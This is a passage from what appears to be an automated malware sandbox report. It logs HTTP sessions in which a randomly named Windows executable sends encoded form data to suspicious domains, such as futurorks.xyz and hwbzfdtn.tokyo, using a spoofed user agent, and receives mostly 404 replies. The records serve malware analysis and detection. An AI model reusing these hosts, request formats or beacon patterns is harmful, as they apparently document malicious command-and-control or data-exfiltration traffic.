4f 73 72 31 66 67 36 6e 59 71 34 67 [TRUNCATED]
                                                                                Data Ascii: GhEtuH=Qlo3ysBqeoUyt/tsq6NofVAU2LdNlL5DR1SZFs3nkcZuwMDzQ+ztyC0/PulmnQHNNtTwmjXcm2MQ2Nj3VUzUXwu6G1+4m4pAjZfEBR7QyeZQ/9qRJWOHlqALeagV7uxYciFF+e/TwwEScuol/7TMt7S5SDQooc5dPmhuKYDtRN55ObqQRsK2RuBylpCO1A9YqnvcSsiSkVXMpk9v7zINCmcvEWmtEJdg8yMZsai0MuXHn8fRX40BqaKipYSTWOyy5g6XlFfKqdf56s9hwHvkKdNcuCVgHQKj17xNRDoRKdLF+gJKgFRuEO8XkxXfns1Osr1fg6nYq4g5v6n5urjrk0lvslBPeMu4XxEesaNhErBKs2rHVfxglxV5xrh7Ni/LkSjBouDnqlC79m48v6C7EroYIO/F/Iehu0kqBZrk+3Lo0fZJ8ra2rSYlSddogt1g7aZCEAQdLPWvW09JKTxJct20MQrRIKjo7V46+2+b9s8B91cLMu/oW1WCPc7oyplxjik3/W8ebHs0quf7Zc5IP70FfAFK/90vgtCJzOV49CuVOVc3xrAkogQ7D2ad2Osi4XoUBOYBCDsPRlvhLIuPZV2aGg1LA6z5gRAoDWhhJ7tH/qBDriZ37uGcJcbAm645ne25FZIpTltLqFYd/3kc0HgtWJLCbdtcniI7DqvioEkboXlMFIRO6FBb8c56bGFPog6EnfutWLODevjaJ13cxIyqEoUe3b5OaExF4s1Tt9pVCOYuY1uGEl62Jr2f0LPWUaeji8XxjzAADrfFSqDo1hIqAIjgvps5aECxSJhmX42WMYpaMfGerbpdeH4O74Daa3tVqD5njLzeQ1v3dDWN/dvRi23q3x9mBVYuWR8Hb3iatxDOZj/jnt/2+p7buIabHzWDw8j2hR2vn4Xeuum5sxyTs1Yj/CjDYVyQVGGVdXkbXoJtskMfCHOkD1cn6apomufYpxCU60wyb6fphT7QG+a1DobCaDeqiO58WdRtTgk/i [TRUNCATED]
                                                                                Dec 4, 2024 15:33:22.907182932 CET927INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:22 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0EewMiMVQtNSCgy83Qg%2BUQhRNaGDrPSoEYTBWG98HIk8%2FnLYcz8F2TX13Juf0EH%2FwfyQok70AT%2BqrWwyWMOveqm0Tv9gI6OZGmE1jQntXPfw74rY6dbkv64A9JAet8P3STydcOIv%2B0G7Zxv"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc82dd0c593308-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1880&min_rtt=1880&rtt_var=940&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1807&delivery_rate=0&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.749996172.67.192.207807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:24.527251959 CET499OUTGET /8292/?GhEtuH=dnAXxbFHa6RK1uN3p+sQJBgkj7tI4LA3ZFKVH8On554fy+qRTfvRsSc0GNZ8hi+JaenG7xaf5F4Z1N3TeCmANQO8Fwm04ZJnyd/RH1yf5K4Kkfm0UhvZq/AJXt0L6OF1dgVk5sLd5yBY&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.3kw40881107247y.click
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:33:25.701351881 CET941INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:25 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1QepsJyypTd6SyQGDFv4Te9O2Bci67NIyJg1MZQhR8KcrN4ChTyHTIm0cwg1mVKqOR1hOS%2FicDonJafgnttYk38GVK221eEpgEiU5TNEK0QZfCeLRD6lt99o5AvTd4ZN9ONW%2Fazn%2FRC%2FBWR"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc82ee79e5436d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=23537&min_rtt=23537&rtt_var=11768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=499&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.749997203.161.43.228807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:31.352577925 CET750OUTPOST /cpty/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.futurorks.xyz
                                                                                Origin: http://www.futurorks.xyz
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.futurorks.xyz/cpty/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 49 4d 43 2f 73 47 62 31 32 42 56 67 61 4e 62 34 6b 37 52 55 69 66 6b 55 61 4b 59 6d 66 35 51 61 6b 69 6c 7a 39 2b 32 62 73 66 79 38 36 72 58 54 74 33 56 6d 78 6c 39 36 6e 62 63 55 6f 72 4c 36 6a 76 67 6f 56 34 78 38 68 45 43 7a 6c 33 51 35 76 43 57 33 37 68 56 4c 2b 73 42 61 5a 31 63 69 34 5a 68 61 66 4f 70 68 63 48 6b 32 55 52 65 48 71 37 4e 2f 71 76 7a 6f 78 52 54 38 35 73 6b 43 75 69 61 63 42 43 6e 76 41 30 4e 69 6e 76 58 5a 2b 44 38 45 37 30 49 68 58 48 2b 78 41 58 39 6b 45 37 2f 62 69 4c 65 77 73 54 36 39 76 6e 47 4a 32 72 68 37 58 6c 2f 34 56 69 35 39 47 6c 55 61 31 46 62 62 47 32 61 6a 62 63 32 4f 6e 39 31 6c 45 41 3d 3d
                                                                                Data Ascii: GhEtuH=IMC/sGb12BVgaNb4k7RUifkUaKYmf5Qakilz9+2bsfy86rXTt3Vmxl96nbcUorL6jvgoV4x8hECzl3Q5vCW37hVL+sBaZ1ci4ZhafOphcHk2UReHq7N/qvzoxRT85skCuiacBCnvA0NinvXZ+D8E70IhXH+xAX9kE7/biLewsT69vnGJ2rh7Xl/4Vi59GlUa1FbbG2ajbc2On91lEA==
                                                                                Dec 4, 2024 15:33:32.682960033 CET658INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:32 GMT
                                                                                Server: Apache
                                                                                Content-Length: 514
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.749998203.161.43.228807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:34.035279989 CET770OUTPOST /cpty/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.futurorks.xyz
                                                                                Origin: http://www.futurorks.xyz
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.futurorks.xyz/cpty/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 49 4d 43 2f 73 47 62 31 32 42 56 67 59 75 44 34 6a 73 4e 55 31 50 6b 58 56 71 59 6d 52 70 51 6b 6b 69 35 7a 39 38 61 78 73 70 61 38 36 4c 6e 54 75 32 56 6d 38 46 39 36 74 37 63 56 73 72 4c 78 6a 76 6c 43 56 38 35 38 68 45 47 7a 6c 79 73 35 76 55 65 30 70 42 56 4e 72 63 42 55 64 31 63 69 34 5a 68 61 66 4f 39 4c 63 44 49 32 55 41 75 48 73 71 4e 38 6a 50 7a 72 35 78 54 38 6f 38 6b 47 75 69 61 71 42 48 2b 79 41 79 4a 69 6e 71 72 5a 2f 53 38 48 31 30 4a 6b 4a 33 2b 75 41 6b 4d 78 62 4a 6a 65 6e 35 4c 76 6c 52 6d 44 71 52 48 72 73 4a 74 58 4a 30 48 44 52 67 64 4c 52 44 4a 76 33 45 66 44 4c 55 75 43 45 72 54 6b 71 76 55 68 53 37 6e 46 76 67 76 4d 4e 58 6c 2b 4e 67 43 72 38 49 50 44 61 42 51 3d
                                                                                Data Ascii: GhEtuH=IMC/sGb12BVgYuD4jsNU1PkXVqYmRpQkki5z98axspa86LnTu2Vm8F96t7cVsrLxjvlCV858hEGzlys5vUe0pBVNrcBUd1ci4ZhafO9LcDI2UAuHsqN8jPzr5xT8o8kGuiaqBH+yAyJinqrZ/S8H10JkJ3+uAkMxbJjen5LvlRmDqRHrsJtXJ0HDRgdLRDJv3EfDLUuCErTkqvUhS7nFvgvMNXl+NgCr8IPDaBQ=
                                                                                Dec 4, 2024 15:33:35.249555111 CET658INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:35 GMT
                                                                                Server: Apache
                                                                                Content-Length: 514
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.749999203.161.43.228807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:36.712016106 CET1783OUTPOST /cpty/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.futurorks.xyz
                                                                                Origin: http://www.futurorks.xyz
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.futurorks.xyz/cpty/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 49 4d 43 2f 73 47 62 31 32 42 56 67 59 75 44 34 6a 73 4e 55 31 50 6b 58 56 71 59 6d 52 70 51 6b 6b 69 35 7a 39 38 61 78 73 70 69 38 37 34 76 54 75 52 42 6d 39 46 39 36 75 37 63 51 73 72 4c 73 6a 76 64 47 56 38 39 47 68 42 61 7a 6c 55 34 35 2b 52 2b 30 6a 42 56 4e 30 4d 42 5a 5a 31 64 32 34 5a 78 65 66 4f 74 4c 63 44 49 32 55 43 32 48 39 37 4e 38 6c 50 7a 6f 78 52 53 6f 35 73 6c 68 75 69 43 36 42 48 4c 46 41 42 42 69 6d 4b 62 5a 79 41 6b 48 39 30 4a 71 49 33 2f 37 41 6b 42 68 62 49 50 6f 6e 34 2b 45 6c 52 65 44 70 48 32 52 37 4c 6c 66 61 55 58 47 49 52 74 36 52 69 56 38 75 43 65 67 46 6d 79 53 4f 4d 48 48 6c 4a 38 4d 66 72 75 4a 2b 44 58 49 43 31 6c 4d 44 33 4c 78 35 4b 33 68 4e 6c 74 61 39 6c 51 33 75 56 34 79 44 4d 36 62 70 6d 50 46 79 57 41 73 6f 6a 61 2b 6e 2b 4b 35 55 4c 2b 66 56 61 44 4f 4b 5a 54 64 6c 74 4f 31 4e 6d 58 77 49 37 42 6c 46 48 52 4f 50 30 6b 37 53 59 52 69 47 61 59 2b 71 30 41 61 42 53 4a 4c 58 67 6a 6f 53 2b 50 42 6a 59 34 41 54 6e 6d 53 78 37 7a 32 4c 48 35 [TRUNCATED]
                                                                                Data Ascii: GhEtuH=IMC/sGb12BVgYuD4jsNU1PkXVqYmRpQkki5z98axspi874vTuRBm9F96u7cQsrLsjvdGV89GhBazlU45+R+0jBVN0MBZZ1d24ZxefOtLcDI2UC2H97N8lPzoxRSo5slhuiC6BHLFABBimKbZyAkH90JqI3/7AkBhbIPon4+ElReDpH2R7LlfaUXGIRt6RiV8uCegFmySOMHHlJ8MfruJ+DXIC1lMD3Lx5K3hNlta9lQ3uV4yDM6bpmPFyWAsoja+n+K5UL+fVaDOKZTdltO1NmXwI7BlFHROP0k7SYRiGaY+q0AaBSJLXgjoS+PBjY4ATnmSx7z2LH50yVOOKa0JjmiK2pVcwsGfZ9OJbcBSK75SXh1N64jY0cyrWhkrJe2MPMkZjjyYCmOp6wENEQr4TRAAnYfZGoSMdqDAEoMj2EZczCRixBt7+Al6lN6vnwh5iRiUvz7sefnUFzRud6ncCBvMO6DDVRpo++vH3k/a3ap7aw61YGR0rS543LZrILrOFWqTw3S/82aeo3mkhIHNBFWPvsWtL0WV313hT50x0fsf4Lb4/Lxra0z+mZ5XbboQ8sLi6dRITa4evYaeOQGD7x94LkYgSJrurpoFRWIZqA8Gk0UQ3CQgRX6RueHD89GXH0MZuWc6XUK3K1XgEn2hATzUwTm9XhTBkgwbAXnOJFkgGtIUEjeTztXmKLI3sxbEN8BHZzBQx5aGJ8unNHfn4B93YQkzG7hHajCA9MLcrtfZjov47yA3uxvJ94zwVxId/ZJlmNurHO+RTY5AweLH2U857OFPg2ZEpq9wUtntAL1adi/WG8/TZuRae/SkZGjxo0nawpv+3ab9XX6OeZLLU8v7MzmjERga/tjcT3x2NtylvrP2JOVfJToR3I0NoDTCpP+qaMpEjGVNmv6TYkpp8yHZ0uIBKQvv9dS51oJrvVBenNyrNbQKy+5nW/YzwVUtRMAHD9Hp6ojo3z8AD8xoja1C453pPnJCWdBUuMNRz9Enm [TRUNCATED]
                                                                                Dec 4, 2024 15:33:37.931548119 CET658INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:37 GMT
                                                                                Server: Apache
                                                                                Content-Length: 514
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.750000203.161.43.228807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:39.373671055 CET491OUTGET /cpty/?GhEtuH=FOqfvw/D9TxLZ9zn5tlxjpsMOed4GZEMgX1z5u2hu/q28qXHvFp93Fs8lYoTq8WZ051sNJVY/UqOjH0F7ziUmXJv/tNxSQB91KtCf68XTy52NA+Nrb8mvfzj4zmGoOcEjhOtBV7kDBoK&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.futurorks.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:33:40.669245958 CET673INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:40 GMT
                                                                                Server: Apache
                                                                                Content-Length: 514
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.7500018.223.59.213807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:47.365998983 CET753OUTPOST /3pje/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.hwbzfdtn.tokyo
                                                                                Origin: http://www.hwbzfdtn.tokyo
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.hwbzfdtn.tokyo/3pje/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 37 41 52 31 66 34 55 64 58 6a 5a 35 6f 6f 49 42 37 78 37 36 36 5a 56 62 5a 2b 31 56 35 68 66 4b 2b 6a 6c 6b 4c 31 6c 76 43 79 44 63 37 34 4b 54 44 77 74 52 31 45 2b 6c 54 61 53 4e 36 59 69 53 59 51 51 76 31 72 70 7a 67 65 41 32 41 50 77 34 6d 37 4a 4a 5a 47 68 32 62 71 39 78 46 36 64 74 56 4d 58 6b 34 71 31 41 59 31 74 54 41 39 2f 65 50 2b 7a 36 74 71 6f 45 47 46 75 43 4a 59 76 47 76 74 58 64 79 6f 37 58 7a 55 56 49 49 78 30 79 73 6e 41 67 57 79 2f 33 54 70 6d 46 62 66 2b 43 76 46 51 6b 4d 4a 56 31 68 51 41 79 30 54 6b 78 32 4f 70 36 34 61 57 66 7a 6c 64 44 6d 32 43 42 75 6f 65 57 5a 49 41 73 51 57 67 6d 47 76 56 39 63 67 3d 3d
